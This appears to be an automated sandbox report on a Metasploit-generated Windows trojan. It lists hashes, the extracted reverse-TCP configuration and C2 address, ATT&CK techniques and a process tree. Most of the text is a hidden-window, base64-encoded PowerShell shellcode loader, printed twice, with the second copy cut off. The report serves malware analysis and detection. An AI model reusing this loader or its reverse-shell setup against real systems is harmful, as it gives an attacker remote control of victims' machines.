metasploit | ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4

General

Target

ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4N.exe
Size

17KB
MD5

1ad437b06f6b1901d85f454faea19560
SHA1

37feefcbb97ce675a732f995fba0be4c3f9d92bf
SHA256

ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4
SHA512

c123189fb4ab7e0c389f7c91f8762a713aeaaf49432a075886a6e58d36b0dcb47bf5314d4ae3dd462079652f973be8fe5554a2b2b80576d4dc56ce97a75e592a
SSDEEP

384:UjcjwcOkjc5lPvL/c1fcKj8cRJPxD9oXiIdhIn/PCcmL6npalkXWJPoH:Ujcjwc1jc5B/c1fcKj8chGMPCcfpBXW4

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

10.0.2.15:2222

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2520	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2520	powershell.exe
2320	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	2320	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1928 wrote to memory of 2108	1928	ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4N.exe	31
PID 1928 wrote to memory of 2108	1928	ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4N.exe	31
PID 1928 wrote to memory of 2108	1928	ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4N.exe	31
PID 2108 wrote to memory of 2520	2108	cmd.exe	32
PID 2108 wrote to memory of 2520	2108	cmd.exe	32
PID 2108 wrote to memory of 2520	2108	cmd.exe	32
PID 2520 wrote to memory of 2320	2520	powershell.exe	33
PID 2520 wrote to memory of 2320	2520	powershell.exe	33
PID 2520 wrote to memory of 2320	2520	powershell.exe	33
PID 2520 wrote to memory of 2320	2520	powershell.exe	33
PID 2320 wrote to memory of 2876	2320	powershell.exe	34
PID 2320 wrote to memory of 2876	2320	powershell.exe	34
PID 2320 wrote to memory of 2876	2320	powershell.exe	34
PID 2320 wrote to memory of 2876	2320	powershell.exe	34
PID 2876 wrote to memory of 2724	2876	csc.exe	35
PID 2876 wrote to memory of 2724	2876	csc.exe	35
PID 2876 wrote to memory of 2724	2876	csc.exe	35
PID 2876 wrote to memory of 2724	2876	csc.exe	35

C:\Users\Admin\AppData\Local\Temp\ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4N.exe
"C:\Users\Admin\AppData\Local\Temp\ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4N.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB6ADUAZQB1ACAAPQAgACcAJAB0ADQAQQBXACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHQANABBAFcAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBmACwAMAB4ADgANQAsADAAeAA4ADkALAAwAHgAZQAyACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA0ADcALAAwAHgAOABkACwAMAB4ADAAMAAsADAAeAA0ADEALAAwAHgAYgBiACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAYQBhACwAMAB4ADQAMwAsADAAeAA3ADcALAAwAHgAMwA0ACwAMAB4ADkAYQAsADAAeAA5ADEALAAwAHgAZgBlACwAMAB4ADUAMQAsADAAeABiADgALAAwAHgAOQBlACwAMAB4ADUAMwAsADAAeABhAGEALAAwAHgAYwBhACwAMAB4AGYAMgAsADAAeAA1AGYALAAwAHgANAAxACwAMAB4ADkAZQAsADAAeABlADYALAAwAHgAZAA0ACwAMAB4ADIANwAsADAAeAAzADcALAAwAHgAMAA5ACwAMAB4ADUAYwAsADAAeAA4AGQALAAwAHgANgAxACwAMAB4ADIANAAsADAAeAA1AGQALAAwAHgAMgAzACwAMAB4AGEAZQAsADAAeABlAGEALAAwAHgAOQBkACwAMAB4ADIANQAsADAAeAA1ADIALAAwAHgAZgAwACwAMAB4AGYAMQAsADAAeAA4ADUALAAwAHgANgBiACwAMAB4ADMAYgAsADAAeAAwADQALAAwAHgAYwA3ACwAMAB4AGEAYwAsADAAeAA4AGEALAAwAHgANgAyACwAMAB4ADIAOAAsADAAeAA2ADAALAAwAHgAOAA3ACwAMAB4AGQAZgAsADAAeABhADYALAAwAHgAZAAyACwAMAB4ADEAYwAsADAAeAA5AGQALAAwAHgAZgBhACwAMAB4AGQAZAAsADAAeABmADIALAAwAHgAYQA5ACwAMAB4ADQAMwAsADAAeABhADYALAAwAHgANwA3ACwAMAB4ADYAZAAsADAAeAAzADcALAAwAHgAMQBhACwAMAB4ADcANgAsADAAeABiAGUALAAwAHgAMwAzACwAMAB4AGUAYQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4AGMAZgAsADAAeABiADMALAAwAHgAYgAwACwAMAB4ADgAZgAsADAAeAAxAGMALAAwAHgAYwA2ACwAMAB4ADcAOQAsADAAeABmAGIALAAwAHgAOQBlACwAMAB4AGYAOAAsADAAeAA4ADYALAAwAHgANABkACwAMAB4ADUANAAsADAAeABjAGUALAAwAHgAZgAzACwAMAB4ADQAZgAsADAAeABiAGMALAAwAHgAMQBlACwAMAB4AGMAMwAsADAAeABmAGMALAAwAHgAOAAxACwAMAB4AGEAZQAsADAAeABjAGUALAAwAHgAZgBkACwAMAB4AGMANgAsADAAeAAwADkALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAAzAGMALAAwAHgANgBhACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAOAA2ACwAMAB4ADEAMAAsADAAeAAwADkALAAwAHgAMQA5ACwAMAB4ADEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4AGIAOQAsADAAeABmAGQALAAwAHgANAAyACwAMAB4ADAAZgAsADAAeAA1AGYALAAwAHgANwA1ACwAMAB4ADQAOAAsADAAeABlADQALAAwAHgAMgBiACwAMAB4AGQAMQAsADAAeAA0AGQALAAwAHgAZgBiACwAMAB4AGYAOAAsADAAeAA2ADkALAAwAHgANgA5ACwAMAB4ADcAMAAsADAAeABmAGYALAAwAHgAYgBkACwAMAB4AGYAYgAsADAAeABjADIALAAwAHgAMgA0ACwAMAB4ADEAYQAsADAAeABhADcALAAwAHgAOQAxACwAMAB4ADQANQAsADAAeAAzAGIALAAwAHgAMABkACwAMAB4ADcANAAsADAAeAA3ADkALAAwAHgANQBiACwAMAB4AGUAOQAsADAAeAAyADkALAAwAHgAZABmACwAMAB4ADEANwAsADAAeAAxADgALAAwAHgAMwBjACwAMAB4ADUAZgAsADAAeABkADgALAAwAHgAZQAyACwAMAB4ADQAMQAsADAAeAAzAGQALAAwAHgANABmACwAMAB4ADIAZQAsADAAeAA4AGYALAAwAHgAYgBlACwAMAB4ADgAZgAsADAAeAAzADgALAAwAHgAOQA4ACwAMAB4AGMAZAAsADAAeABiAGQALAAwAHgAZQA3ACwAMAB4ADMAMgAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4ADYAMAAsADAAeAA5AGMALAAwAHgAOQBkACwAMAB4ADgANwAsADAAeAA2ADcALAAwAHgAMQBmACwAMAB4ADcAMQAsADAAeAAyAGYALAAwAHgAZQA3ACwAMAB4AGQAZQAsADAAeAA3ADIALAAwAHgANQAwACwAMAB4ADIAMQAsADAAeAAyADQALAAwAHgAMgA2ACwAMAB4ADAAMAAsADAAeAA1ADkALAAwAHgAOABkACwAMAB4ADQANwAsADAAeABjAGIALAAwAHgAOQA5ACwAMAB4ADMAMgAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADkAMAAsADAAeABhADQALAAwAHgAMQA3ACwAMAB4ADcANwAsADAAeABhADYALAAwAHgAMwBiACwAMAB4ADQAMAAsADAAeAA3ADUALAAwAHgAYQA2ACwAMAB4ADQAYgAsADAAeAAzAGUALAAwAHgAZgAwACwAMAB4ADQAMAAsADAAeAAxAGIALAAwAHgANgBlACwAMAB4ADUAMwAsADAAeABkAGQALAAwAHgAZABiACwAMAB4AGQAZQAsADAAeAAxADMALAAwAHgAOABkACwAMAB4AGIAMwAsADAAeAAzADQALAAwAHgAOQBjACwAMAB4AGYAMgAsADAAeABhADMALAAwAHgAMwA2ACwAMAB4ADcANgAsADAAeAA5AGIALAAwAHgANAA5ACwAMAB4AGQAOQAsADAAeAAyAGYALAAwAHgAZgAzACwAMAB4AGUANQAsADAAeAA0ADAALAAwAHgANgBhACwAMAB4ADgAZgAsADAAeAA5ADQALAAwAHgAOABkACwAMAB4AGEAMAAsADAAeABmADUALAAwAHgAOQA2ACwAMAB4ADAANgAsADAAeAA0ADcALAAwAHgAMAA5ACwAMAB4ADUAOAAsADAAeABlAGYALAAwAHgAMgAyACwAMAB4ADEAOQAsADAAeAAwAGMALAAwAHgAMQBmACwAMAB4ADcAOQAsADAAeAA0ADMALAAwAHgAOQBhACwAMAB4ADIAMAAsADAAeAA1ADcALAAwAHgAZQBlACwAMAB4ADIAMgAsADAAeABiADUALAAwAHgANQBjACwAMAB4AGIAOQAsADAAeAA3ADUALAAwAHgAMgAxACwAMAB4ADUAZgAsADAAeAA5AGMALAAwAHgAYgAxACwAMAB4AGUAZQAsADAAeABhADAALAAwAHgAYwBiACwAMAB4AGMAYQAsADAAeAAyADcALAAwAHgAMwA1ACwAMAB4AGIANAAsADAAeABhADQALAAwAHgANAA3ACwAMAB4AGQAOQAsADAAeAAzADQALAAwAHgAMwA0ACwAMAB4ADEAZQAsADAAeABiADMALAAwAHgAMwA0ACwAMAB4ADUAYwAsADAAeABjADYALAAwAHgAZQA3ACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMAA5ACwAMAB4ADMAMgAsADAAeAAxAGIALAAwAHgAZAAyACwAMAB4ADkAYwAsADAAeABiAGQALAAwAHgANABhACwAMAB4ADgANwAsADAAeAAzADcALAAwAHgAZAA2ACwAMAB4ADcAMAAsADAAeABmAGUALAAwAHgANwAwACwAMAB4ADcAOQAsADAAeAA4AGEALAAwAHgAZAA1ACwAMAB4ADgAMAAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADEAMwAsADAAeABmADcALAAwAHgAYQA3ACwAMAB4ADUAZAA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZQBVADMAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGUAVQAzAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABlAFUAMwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHoANQBlAHUAKQApADsAJAAyAGgAYgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAE0AYgBnAHoAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQATQBiAGcAegAgACQAMgBoAGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAMgBoAGIAIAAkAGUAIgA7AH0A
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAB6ADUAZQB1ACAAPQAgACcAJAB0ADQAQQBXACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHQANABBAFcAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBmACwAMAB4ADgANQAsADAAeAA4ADkALAAwAHgAZQAyACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA0ADcALAAwAHgAOABkACwAMAB4ADAAMAAsADAAeAA0ADEALAAwAHgAYgBiACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAYQBhACwAMAB4ADQAMwAsADAAeAA3ADcALAAwAHgAMwA0ACwAMAB4ADkAYQAsADAAeAA5ADEALAAwAHgAZgBlACwAMAB4ADUAMQAsADAAeABiADgALAAwAHgAOQBlACwAMAB4ADUAMwAsADAAeABhAGEALAAwAHgAYwBhACwAMAB4AGYAMgAsADAAeAA1AGYALAAwAHgANAAxACwAMAB4ADkAZQAsADAAeABlADYALAAwAHgAZAA0ACwAMAB4ADIANwAsADAAeAAzADcALAAwAHgAMAA5ACwAMAB4ADUAYwAsADAAeAA4AGQALAAwAHgANgAxACwAMAB4ADIANAAsADAAeAA1AGQALAAwAHgAMgAzACwAMAB4AGEAZQAsADAAeABlAGEALAAwAHgAOQBkACwAMAB4ADIANQAsADAAeAA1ADIALAAwAHgAZgAwACwAMAB4AGYAMQAsADAAeAA4ADUALAAwAHgANgBiACwAMAB4ADMAYgAsADAAeAAwADQALAAwAHgAYwA3ACwAMAB4AGEAYwAsADAAeAA4AGEALAAwAHgANgAyACwAMAB4ADIAOAAsADAAeAA2ADAALAAwAHgAOAA3ACwAMAB4AGQAZgAsADAAeABhADYALAAwAHgAZAAyACwAMAB4ADEAYwAsADAAeAA5AGQALAAwAHgAZgBhACwAMAB4AGQAZAAsADAAeABmADIALAAwAHgAYQA5ACwAMAB4ADQAMwAsADAAeABhADYALAAwAHgANwA3ACwAMAB4ADYAZAAsADAAeAAzADcALAAwAHgAMQBhACwAMAB4ADcANgAsADAAeABiAGUALAAwAHgAMwAzACwAMAB4AGUAYQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4AGMAZgAsADAAeABiADMALAAwAHgAYgAwACwAMAB4ADgAZgAsADAAeAAxAGMALAAwAHgAYwA2ACwAMAB4ADcAOQAsADAAeABmAGIALAAwAHgAOQBlACwAMAB4AGYAOAAsADAAeAA4ADYALAAwAHgANABkACwAMAB4ADUANAAsADAAeABjAGUALAAwAHgAZgAzACwAMAB4ADQAZgAsADAAeABiAGMALAAwAHgAMQBlACwAMAB4AGMAMwAsADAAeABmAGMALAAwAHgAOAAxACwAMAB4AGEAZQAsADAAeABjAGUALAAwAHgAZgBkACwAMAB4AGMANgAsADAAeAAwADkALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAAzAGMALAAwAHgANgBhACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAOAA2ACwAMAB4ADEAMAAsADAAeAAwADkALAAwAHgAMQA5ACwAMAB4ADEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4AGIAOQAsADAAeABmAGQALAAwAHgANAAyACwAMAB4ADAAZgAsADAAeAA1AGYALAAwAHgANwA1ACwAMAB4ADQAOAAsADAAeABlADQALAAwAHgAMgBiACwAMAB4AGQAMQAsADAAeAA0AGQALAAwAHgAZgBiACwAMAB4AGYAOAAsADAAeAA2ADkALAAwAHgANgA5ACwAMAB4ADcAMAAsADAAeABmAGYALAAwAHgAYgBkACwAMAB4AGYAYgAsADAAeABjADIALAAwAHgAMgA0ACwAMAB4ADEAYQAsADAAeABhADcALAAwAHgAOQAxACwAMAB4ADQANQAsADAAeAAzAGIALAAwAHgAMABkACwAMAB4ADcANAAsADAAeAA3ADkALAAwAHgANQBiACwAMAB4AGUAOQAsADAAeAAyADkALAAwAHgAZABmACwAMAB4ADEANwAsADAAeAAxADgALAAwAHgAMwBjACwAMAB4ADUAZgAsADAAeABkADgALAAwAHgAZQAyACwAMAB4ADQAMQAsADAAeAAzAGQALAAwAHgANABmACwAMAB4ADIAZQAsADAAeAA4AGYALAAwAHgAYgBlACwAMAB4ADgAZgAsADAAeAAzADgALAAwAHgAOQA4ACwAMAB4AGMAZAAsADAAeABiAGQALAAwAHgAZQA3ACwAMAB4ADMAMgAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4ADYAMAAsADAAeAA5AGMALAAwAHgAOQBkACwAMAB4ADgANwAsADAAeAA2ADcALAAwAHgAMQBmACwAMAB4ADcAMQAsADAAeAAyAGYALAAwAHgAZQA3ACwAMAB4AGQAZQAsADAAeAA3ADIALAAwAHgANQAwACwAMAB4ADIAMQAsADAAeAAyADQALAAwAHgAMgA2ACwAMAB4ADAAMAAsADAAeAA1ADkALAAwAHgAOABkACwAMAB4ADQANwAsADAAeABjAGIALAAwAHgAOQA5ACwAMAB4ADMAMgAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADkAMAAsADAAeABhADQALAAwAHgAMQA3ACwAMAB4ADcANwAsADAAeABhADYALAAwAHgAMwBiACwAMAB4ADQAMAAsADAAeAA3ADUALAAwAHgAYQA2ACwAMAB4ADQAYgAsADAAeAAzAGUALAAwAHgAZgAwACwAMAB4ADQAMAAsADAAeAAxAGIALAAwAHgANgBlACwAMAB4ADUAMwAsADAAeABkAGQALAAwAHgAZABiACwAMAB4AGQAZQAsADAAeAAxADMALAAwAHgAOABkACwAMAB4AGIAMwAsADAAeAAzADQALAAwAHgAOQBjACwAMAB4AGYAMgAsADAAeABhADMALAAwAHgAMwA2ACwAMAB4ADcANgAsADAAeAA5AGIALAAwAHgANAA5ACwAMAB4AGQAOQAsADAAeAAyAGYALAAwAHgAZgAzACwAMAB4AGUANQAsADAAeAA0ADAALAAwAHgANgBhACwAMAB4ADgAZgAsADAAeAA5ADQALAAwAHgAOABkACwAMAB4AGEAMAAsADAAeABmADUALAAwAHgAOQA2ACwAMAB4ADAANgAsADAAeAA0ADcALAAwAHgAMAA5ACwAMAB4ADUAOAAsADAAeABlAGYALAAwAHgAMgAyACwAMAB4ADEAOQAsADAAeAAwAGMALAAwAHgAMQBmACwAMAB4ADcAOQAsADAAeAA0ADMALAAwAHgAOQBhACwAMAB4ADIAMAAsADAAeAA1ADcALAAwAHgAZQBlACwAMAB4ADIAMgAsADAAeABiADUALAAwAHgANQBjACwAMAB4AGIAOQAsADAAeAA3ADUALAAwAHgAMgAxACwAMAB4ADUAZgAsADAAeAA5AGMALAAwAHgAYgAxACwAMAB4AGUAZQAsADAAeABhADAALAAwAHgAYwBiACwAMAB4AGMAYQAsADAAeAAyADcALAAwAHgAMwA1ACwAMAB4AGIANAAsADAAeABhADQALAAwAHgANAA3ACwAMAB4AGQAOQAsADAAeAAzADQALAAwAHgAMwA0ACwAMAB4ADEAZQAsADAAeABiADMALAAwAHgAMwA0ACwAMAB4ADUAYwAsADAAeABjADYALAAwAHgAZQA3ACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMAA5ACwAMAB4ADMAMgAsADAAeAAxAGIALAAwAHgAZAAyACwAMAB4ADkAYwAsADAAeABiAGQALAAwAHgANABhACwAMAB4ADgANwAsADAAeAAzADcALAAwAHgAZAA2ACwAMAB4ADcAMAAsADAAeABmAGUALAAwAHgANwAwACwAMAB4ADcAOQAsADAAeAA4AGEALAAwAHgAZAA1ACwAMAB4ADgAMAAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADEAMwAsADAAeABmADcALAAwAHgAYQA3ACwAMAB4ADUAZAA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZQBVADMAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGUAVQAzAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABlAFUAMwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHoANQBlAHUAKQApADsAJAAyAGgAYgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAE0AYgBnAHoAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQATQBiAGcAegAgACQAMgBoAGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQBy